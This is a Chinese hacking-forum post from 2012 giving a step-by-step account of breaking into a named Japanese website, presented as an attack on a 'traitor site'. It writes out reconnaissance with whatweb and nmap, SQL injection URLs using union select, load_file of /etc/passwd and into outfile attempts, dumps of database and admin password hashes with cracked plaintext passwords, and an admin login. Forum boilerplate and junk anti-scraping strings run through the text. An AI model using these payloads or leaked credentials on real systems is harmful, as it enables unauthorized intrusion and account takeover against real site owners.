找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3417|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
  ~- B* }3 `7 w" P. y
0 }8 W7 P, u  \) t' c: w
0x01. 检测 www.zuaa.jp 收集数据
; A4 ?5 Z) F) B3 ?8 m2 c0 s9 H+ b( Z9 w% G

5 C4 a4 {6 _4 A" V$ xwhatweb% o$ ]. }# W7 a- E$ X( l, V

, q( h: i2 ^; G5 t9 B7 }# L7 r$ M  V# \2 g. k/ U
利用NMAP扫描
. {6 C9 f3 q4 a- }3 y- i/ G% \
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% l% H# k3 Q+ Y( [& Q+ V: k6 J0x02.找注入点* v* W' Z: F1 e3 c; Y$ f# y
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3903 k: f+ D3 c4 i( d, Z1 D5 O

' _5 s5 ?  n$ r; c" J2 y- ~* m
. n# X( _( l9 x1 _$ c& `0x03.order by& v1 r+ d. _4 D% {
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
% R" C( _: u/ B! I9 m
3 r8 b8 [& d6 W7 T: ]; Z' porder by 28报错,order by 27正常
" ^- e  B$ n. [% ~: U' G* ?: |0 V; e1 R( H" O8 d
0x04.   union手动查询
% [! g. H$ l1 f& o$ Z$ lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 9 t3 T: T# g- q9 }. o
添加到 27 时正常显示
2 o0 p: ~, o3 h- }1 Q% U  X) I/ D0 W
( M& V' Q, N& Z6 I+ q2 {" X" m6 q中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
# j) d& L% a; C$ a4 c8 K
4 d; ?! l1 u% m! w- u: S0x05. info:+ B+ I7 m, P. d
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! P: P+ P" v' n6 L3 C: y  n" Q+ T% |8 H
user:            root@localhost
0 f/ C! `+ h5 u; X# ddatabase:    openpne- m: H' K9 k) x$ L* A
version:      4.1.222 l3 l3 e# Z2 O( z7 W
os:             portbld-freebsd5.4
% o, l/ D8 m2 X) u# z% }$ K+ n
4 A, z" c) E0 }) N+ a5 F0x06. root用户+ A% W4 ]! h: Z( V
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
6 n4 }  y3 d) w3 dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! q$ n* \! d9 A  j
! c; n2 F! D3 c' p9 ~! p$ ^通过工具转换7 J: q' K1 F# t1 T. Y( M4 y

/ v% Q4 r5 c) V3 J( F$ x中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持  d8 b2 E6 O6 [/ N
* N- ?  h7 k7 b
0x07. 利用 into outfile
8 M! g# Z- X% Q; e. |! M全部都失败) r1 x; W3 ?( [& a  @& b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 @# k( [/ E$ a( ^$ Q( P" d( P
+ b' J" v: D. @5 ?  Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php * a  v6 V0 H. M% j4 Y, H
, U3 L# }; e, O* ?# \
页面显示“MDB2 Error:syntax error”
  h% J$ m+ t8 ~1 a4 k; D+ D- V2 X1 ]6 \) |3 O5 m
0x08. 利用 mysql 4.1
% f9 B& Q& B  l3 m9 m, s猜常规表名,字段未果 工具 sqlmap- a) ]& W$ G6 @! a1 s
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# r  J+ P/ k2 Q

" \5 a" z7 V- ~! f+ H0 c: i/ T5 A0 H" h6 ]' M. B
( g/ E  V& G4 c4 W- N. o' m$ h
0x09. 查找后台! z7 c' L# }% F7 N; \, Y0 R2 o
利用 现有的各种 后台工具尝试都不行
' ]9 i4 H# S& u. r) e9 O# n( Y1 U/ c. x) O5 t4 C. t
0x10.  MySL外联方法$ X9 v1 C: N5 D2 |3 ]) P
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行6 |/ [# S$ z  i3 q% O
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
9 l- K# J8 Z  v# ^" `% thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user; X5 P* y* n9 D  u! y

, l, n! }4 Z7 H, v+ Y( E. b, ?. E! ^这个可以在 www.cmd5.com 解密+ @* p, ^' J& U5 ^
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009% }0 B& ~8 F2 `% x
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
( _% [6 A5 O! ~4 s: L1 {% kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
$ L% s( `. g' o) Z8 bzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???1 x3 }% I, \0 a6 [- _* j
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
+ a9 D- c7 G; y
' e, H2 q1 P9 J& l6 L. w! r6 z$ X% u, K  x) Q
0x11. 网站突破
! f" \  D! d0 z5 K9 u, A; R发现网站的源程序 openpne, google 下载 openpne 源码3 D- x7 r& W5 w5 E# k
6 o! l0 z5 ^1 D. @! o5 X

4 B. P4 J# V0 J  N4 _. w0x12. 默认信息利用
6 M# N  R2 i/ Khttp://sns.zuaa.jp/?m=admin&a=page_login3 B' p; Y  J3 E- w

2 j2 a9 l. {( f2 j+ W表名 (c_admin_user) ,字段名(username,password)! R( g4 e( q* l' T4 n0 P7 A  M
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user  H8 `* G+ U" F7 j) ^* k0 A# j
% \& j( S+ E* c5 x- Z7 b
解密) u9 a' |! t/ O8 z* K! ~& Q1 \
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20096 z% ]9 z8 D- i% {+ X5 K  n5 A+ n
zuaajp:c0923ec5857796a393da99905008c176,          zju1897. S8 ^- A# v) j- k
: C' P' `# t7 l" P4 d$ N' ^6 R
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 |% r) ?' {& M$ y' N6 a( @# J2 f* X* D) }
0x13. 登录后台, t" l3 D- b7 w: b% R& y* A
: `) Z% w7 f, r; S
8 I6 {1 ~$ f( Y$ }- i
$ I" q, r7 R6 T  J& |4 E
0x14. 小结+ E3 Z+ |( ?* j% Q' f  J- d! u
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。9 e8 Q) u2 i! T6 G) A' w5 s
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
9 y4 G9 v3 m5 s3 b  C------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain2 X* K% R1 A1 ]- c5 I5 Q9 Y2 J
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: N2 `! F& j: h0 y% ~
- u, b4 Y6 `" X6 f6 I9 M最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
! d& l* ?8 t) m  |" G0 T

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表